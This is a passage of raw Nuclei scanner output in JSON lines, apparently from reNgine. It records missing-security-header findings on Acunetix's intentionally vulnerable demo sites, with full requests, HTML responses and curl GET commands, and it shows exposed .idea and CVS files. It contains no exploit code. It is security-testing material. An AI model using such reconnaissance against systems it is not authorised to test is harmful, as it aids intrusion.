bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:03.848215966Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.848226983Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:03.848243934Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:03.848243459Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv id=\\\"siteInfo\\\"\\u003e \\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eAbout Us\\u003c/a\\u003e | \\u003ca href=\\\"privacy.php\\\"\\u003ePrivacy Policy\\u003c/a\\u003e | \\u003ca href=\\\"mailto:wvs@acunetix.com\\\"\\u003eContact Us\\u003c/a\\u003e | \\u003ca href=\\\"/Mod_Rewrite_Shop/\\\"\\u003eShop\\u003c/a\\u003e | \\u003ca href=\\\"/hpp/\\\"\\u003eHTTP Parameter Pollution\\u003c/a\\u003e | \\u0026copy;2019\\n Acunetix Ltd \\n\\u003c/div\\u003e \\n \\n \\n\\u003cbr\\u003e \\n\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\n\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.\\u003c/p\\u003e\\n\\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c/body\\u003e\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:04.147689385Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr' 'http://testphp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea/.name\",\"path\":\"/.idea/.name\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/.name\",\"request\":\"GET /.idea/.name HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 6\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4f911cd6-6\\\"\\r\\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacuart\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:04.147806672Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/.idea\",\"path\":\"/.idea\",\"matched-at\":\"http://testphp.vulnweb.com/.idea/\",\"request\":\"GET /.idea HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:51 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /.idea/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /.idea/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"scopes/\\\"\\u003escopes/\\u003c/a\\u003e 13-Nov-2012 13:29 -\\r\\n\\u003ca href=\\\"acuart.iml\\\"\\u003eacuart.iml\\u003c/a\\u003e 20-Apr-2012 08:22 292\\r\\n\\u003ca href=\\\"encodings.xml\\\"\\u003eencodings.xml\\u003c/a\\u003e 20-Apr-2012 08:22 171\\r\\n\\u003ca href=\\\"misc.xml\\\"\\u003emisc.xml\\u003c/a\\u003e 20-Apr-2012 08:22 266\\r\\n\\u003ca href=\\\"modules.xml\\\"\\u003emodules.xml\\u003c/a\\u003e 20-Apr-2012 08:22 275\\r\\n\\u003ca href=\\\"vcs.xml\\\"\\u003evcs.xml\\u003c/a\\u003e 20-Apr-2012 08:22 173\\r\\n\\u003ca href=\\\"workspace.xml\\\"\\u003eworkspace.xml\\u003c/a\\u003e 20-Apr-2012 08:23 12473\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:04.579392587Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 